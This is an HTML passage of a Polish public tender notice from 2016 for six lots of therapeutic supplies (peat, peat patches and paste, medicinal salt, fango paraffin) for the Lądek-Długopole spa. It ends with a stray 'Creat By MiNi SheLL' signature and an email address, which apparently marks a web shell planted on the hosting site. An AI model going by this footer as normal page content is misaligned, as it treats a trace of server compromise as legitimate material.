                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje zmiany umowy zgodnie z projektami umów stanowiącymi załączniki nr 3 i 3a  do Specyfikacji istotnych Warunków Zamówienia.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/12/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawy borowiny leczniczej dla uzdrowiska Lądek-Długopole S.A.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>A. Część 1 - dostawy borowiny leczniczej dla Uzdrowiska Lądek- Długopole S.A.  w ilości 80 040kg zgodnie z formularzem cenowym  - zał. nr 1a do SIWZ. Borowina lecznicza musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z rozdz. IV  pkt. G. SIWZ. Borowina pakowana w worki foliowe do 30kg. Dostawy do Lądka Zdroju maksymalnie 4 razy w roku. Zakres zamówienia zawiera się w kwocie poniżej 30 tys. euro.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09112200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>właściwości fizyko-chemiczne borowiny (zawartość % substancji organiczno-humusowych s. masy) </td><td>20</td></tr><tr><td>termin płatności </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawy leczniczych plastrów borowinowych małych w ilości 29 500 szt. dla  Uzdrowiska Lądek - Długopole S.A. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>B. Część 2  dostawy leczniczych plastrów borowinowych małych w ilości 29 500 szt. dla  Uzdrowiska Lądek - Długopole S.A. - zgodnie z formularzem cenowym - zał. nr 1b do SIWZ. Plastry borowinowe małe o wymiarach (18x30) cm, dopuszczamy (+3/+3) cm. Sucha masa pokryta flizeliną. Ciężar plastrów minimalnie 410g, plastry jednorazowe w woreczkach PE, szczelnie zamknięte, pakowane w tekturowe pudełka. Plaster wilgotny, ale zwarty, a jego konstrukcja uniemożliwia ochlapanie pacjenta oraz okolicy zabiegu. Borowina lecznicza użyta do produkcji  plastrów  musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z rozdz. IV  pkt. G. SIWZ. 14 500 szt. dla Lądka Zdroju, 15 000 szt. dla Długopola Zdroju. Dostawy raz w miesiącu do Lądka Zdroju i do Długopola Zdroju.Zakres zamówienia zawiera się w kwocie poniżej 30 tys. euro.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33690000-3, 33632100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>właściwości fizyko-chemiczne borowiny (zawartość % substancji organiczno-humusowych s. masy) </td><td>20</td></tr><tr><td>termin płatności</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawy leczniczych plastrów borowinowych dużych  w ilości 8 000 szt. dla  Uzdrowiska Lądek - Długopole S.A.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> C. Część 3  dostawy leczniczych plastrów borowinowych dużych  w ilości 8 000 szt. dla  Uzdrowiska Lądek - Długopole S.A. - zgodnie z formularzem cenowym - zał. nr 1c do SIWZ. Plastry borowinowe duże o wymiarach: (22x35) cm dopuszczamy: (+3/+3) cm. Sucha masa pokryta flizeliną. Ciężar plastrów  minimalnie 600g, plastry jednorazowe w woreczkach PE, szczelnie zamknięte, pakowane w tekturowe pudełka. Plaster wilgotny, ale zwarty, a jego konstrukcja uniemożliwia ochlapanie pacjenta oraz okolicy zabiegu. Borowina lecznicza użyta do produkcji  plastrów  musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z rozdz. IV  pkt. G. SIWZ. Dostawy raz w miesiącu do Długopola Zdroju.Zakres zamówienia zawiera się w kwocie poniżej 30 tys. euro.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33690000-3, 33632100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>właściwości fizyko-chemiczne borowiny (zawartość % substancji organiczno-humusowych s. masy)</td><td>20</td></tr><tr><td>termin płatności</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Dostawy leczniczej pasty borowinowej w ilości 13 000 kg dla  Uzdrowiska Lądek-Długopole S.A. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>D. Część 4  dostawy leczniczej pasty borowinowej w ilości 13 000 kg dla  Uzdrowiska Lądek-Długopole S.A. - zgodnie z formularzem cenowym - zał. nr 1d do SIWZ.  Drobno zmielona, pakowana w wiaderka od 10 kg do 20 kg. Borowina lecznicza użyta do produkcji pasty musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z rozdz. IV  pkt. G. SIWZ.  Dostawy raz w miesiącu do Długopola Zdroju.Zakres zamówienia zawiera się w kwocie poniżej 30 tys. euro.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33690000-3, 33632100-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>właściwości fizyko-chemiczne borowiny (zawartość % substancji organiczno-humusowych s. masy) </td><td>20</td></tr><tr><td>termin płatności</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Dostawy leczniczej soli w ilości 2200 kg dla Uzdrowiska Lądek  Długopole S.A.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>E. Część   5   -  dostawy leczniczej soli w ilości 2200 kg dla Uzdrowiska Lądek  Długopole S.A. zgodnie z formularzem cenowym zał. nr 1e do SIWZ,  będącej naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych. 1 kg preparatu zawiera: kationy: jony sodu nie mniej niż 36%, jony wapnia nie mniej niż 0,2%, jony magnezu nie mniej niż 0,1%, jony żelaza (II),(III) nie mniej niż 0,02%; aniony: jony chlorkowe nie mniej niż 55%.
 Informacje umieszczone na workach: nazwa, skład ilościowy, zawartość opakowania, data ważności, wskazania, przeciwwskazania, pozwolenie Ministerstwa Zdrowia, sposób stosowania, działanie, producent. Worki 10kg  2000 kg, worki 2kg - 200kg. Dostawy 3-4 razy w roku do Długopola Zdroju.
Zakres zamówienia zawiera się w kwocie poniżej 30 tys. euro.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33690000-3, 14450000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>20</td></tr><tr><td>termin płatności</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Dostawy masy fango parafinowej i folii do okładów fango dla Uzdrowiska Lądek  Długopole S.A.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>F. Część   6   -  dostawy masy fango parafinowej i folii do okładów fango dla Uzdrowiska Lądek  Długopole S.A. zgodnie z formularzem cenowym zał. nr 1f do SIWZ.
Masa fango parafinowa opakowanie 12 kg- 30 szt. i folia dł. rolki 1000m, szer. 65cm, gramatura 15 mikronów  10 szt. Dostawy 3-4 razy w roku do Lądka Zdroju.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33690000-3, 33632000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>20</td></tr><tr><td>termin płatności</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com